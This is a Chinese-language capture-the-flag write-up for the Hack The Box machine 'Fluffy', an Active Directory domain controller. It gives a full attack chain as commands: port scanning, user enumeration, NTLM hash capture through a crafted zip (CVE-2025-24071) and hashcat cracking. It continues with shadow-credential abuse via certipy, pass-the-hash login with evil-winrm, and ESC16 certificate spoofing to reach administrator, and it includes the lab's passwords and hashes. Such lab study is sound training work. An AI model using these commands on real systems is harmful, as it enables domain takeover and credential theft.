HTB-Fluffy

扫描全端口：

rustscan -a 10.10.11.69 --range 1-65535 -- -sV
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.69:53
Open 10.10.11.69:88
Open 10.10.11.69:139
Open 10.10.11.69:389
Open 10.10.11.69:445
Open 10.10.11.69:464
Open 10.10.11.69:593
Open 10.10.11.69:636
Open 10.10.11.69:3268
Open 10.10.11.69:3269
Open 10.10.11.69:5985
Open 10.10.11.69:9389
Open 10.10.11.69:49667
Open 10.10.11.69:49678
Open 10.10.11.69:49681
Open 10.10.11.69:49695
Open 10.10.11.69:49701
Open 10.10.11.69:49677
Open 10.10.11.69:49738
[~] Starting Nmap
[>] The Nmap command to be run is nmap -sV -vvv -p 53,88,139,389,445,464,593,636,3268,3269,5985,9389,49667,49678,49681,49695,49701,49677,49738 10.10.11.69

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-24 22:15 -06
NSE: Loaded 46 scripts for scanning.
Initiating Ping Scan at 22:15
Scanning 10.10.11.69 [4 ports]
Completed Ping Scan at 22:15, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:15
Completed Parallel DNS resolution of 1 host. at 22:15, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:15
Scanning 10.10.11.69 [19 ports]
Discovered open port 139/tcp on 10.10.11.69
Discovered open port 53/tcp on 10.10.11.69
Discovered open port 445/tcp on 10.10.11.69
Discovered open port 88/tcp on 10.10.11.69
Discovered open port 49678/tcp on 10.10.11.69
Discovered open port 389/tcp on 10.10.11.69
Discovered open port 636/tcp on 10.10.11.69
Discovered open port 49701/tcp on 10.10.11.69
Discovered open port 49738/tcp on 10.10.11.69
Discovered open port 3268/tcp on 10.10.11.69
Discovered open port 49677/tcp on 10.10.11.69
Discovered open port 3269/tcp on 10.10.11.69
Discovered open port 49695/tcp on 10.10.11.69
Discovered open port 593/tcp on 10.10.11.69
Discovered open port 5985/tcp on 10.10.11.69
Discovered open port 9389/tcp on 10.10.11.69
Discovered open port 464/tcp on 10.10.11.69
Discovered open port 49681/tcp on 10.10.11.69
Discovered open port 49667/tcp on 10.10.11.69
Completed SYN Stealth Scan at 22:15, 0.55s elapsed (19 total ports)
Initiating Service scan at 22:15
Scanning 19 services on 10.10.11.69
Completed Service scan at 22:16, 58.08s elapsed (19 services on 1 host)
NSE: Script scanning 10.10.11.69.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 22:16
Completed NSE at 22:16, 1.27s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 22:16
Completed NSE at 22:16, 0.87s elapsed
Nmap scan report for 10.10.11.69
Host is up, received echo-reply ttl 127 (0.25s latency).
Scanned at 2025-05-24 22:15:47 -06 for 61s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-25 10:54:53Z)
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49695/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49738/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.86 seconds
           Raw packets sent: 23 (988B) | Rcvd: 20 (864B)

给了一个初始的用户名和密码，枚举域内的用户。

ldapsearch -x -H ldap://Fluffy.HTB -D "j.fleischman@Fluffy.htb" -w 'J0elTHEM4n1990!' -b "DC=Fluffy,DC=htb" "(objectClass=user)" sAMAccountName

或者是：
crackmapexec smb 10.10.11.69 -u  j.fleischman -p 'J0elTHEM4n1990!' --users

收集一下字典信息。

可以直接用以下命令：

nxc smb Fluffy.HTB -u 'j.fleischman' -p 'J0elTHEM4n1990!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt

bloodhound分析一下。

bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -d Fluffy.htb -dc dc01.Fluffy.htb -ns 10.10.11.69 -c all --zip

如果是这种情况的话就是vpn的时区和kali的时区问题。

域时间对齐

利用ntpdate对齐：

ntpdate dc01.Fluffy.htb

强制对齐：

chronyd -q "server 10.10.11.69 iburst"

这里利用的ntpdate对齐时间。

如上图，就没上面的报错了。

SMB&cve-2025-24071

没找到啥有用的信息，然后尝试利用SMB共享，账号密码就是给的那个。

crackmapexec smb 10.10.11.69 -u  'j.fleischman' -p  'J0elTHEM4n1990!' --shares 

IT里面存在一些东西。

给了一个cve-2025-24071的exp,和一个pdf文件(里面是该系统存在的一些CVE信息)以及一个zip文件(里面是everything这个工具)

尝试打这个CVE 2025-24071

首先制作一个zip文件，然后上传到IT目录下，只有这个目录才能上传文件。

这个-i 是vpn的ip地址

开启一个smb共享。

impacket-smbserver share ./share -smb2support

然后再将生成的zip文件利用smbclient上传到IP文件下。

smbclient //10.10.11.69/IT -U j.fleischman%J0elTHEM4n1990! -c "put exploit.zip"

然后这个时候就会再smb共享下得到NTLM-hash.

hashcat爆破一下。

hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

得到密码。

影子凭证

winrm是不能直接登录的，再次利用bloodhound收集域信息。

bloodhound-python -u 'p.agila' -p 'prometheusx-303' -d Fluffy.htb -dc dc01.Fluffy.htb -ns 10.10.11.69 -c all --zip

攻击利用如下：

首先P.AGILA用户属于MANAGERS组,MANAGERS组对ACCOUNTS组有GenericAll权限，可以将P.AGILA用户添加到ACCOUNTS组中，ACCOUNTS组对所属的三个用户有GenericWrite权限，打一个影子凭证，去控制winrm_svc用户。

首先将P.AGILA用户加到ACCOUNTS组中：

net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"

然后打影子凭证：

certipy-ad shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account winrm_svc

利用上面的命令直接获取到winrm_svc的hash值，注意需要对齐时间。

evil-winrm -i 10.10.11.69 -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767'

在桌面发现user.txt

ESC16

提权：

如果一个账户能够修改自身的某些关键 AD 属性，并且证书颁发机构 (CA) 在颁发证书时会使用这些属性来确定证书的身份，那么就可以通过临时修改这些属性来“欺骗”CA 颁发一个代表其他用户（如管理员）的证书。UPN 就是这样一个关键属性.

获取ca_svc的hash

certipy-ad find -u ca_svc@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -stdout -vulnerable -dc-ip 10.10.11.69  //查看容易遭受的漏洞

1.把 ca_svc用户的 UPN 改为administrator
certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update

2.向证书颁发机构(CA)请求证书，请求的模板是 user证书模板
certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

3：把 UPN 改回成ca_svc恢复原貌
certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

4.使用证书进行认证，得到高权限用户哈希
certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip 10.10.11.69

最后evil-winrm登录即可。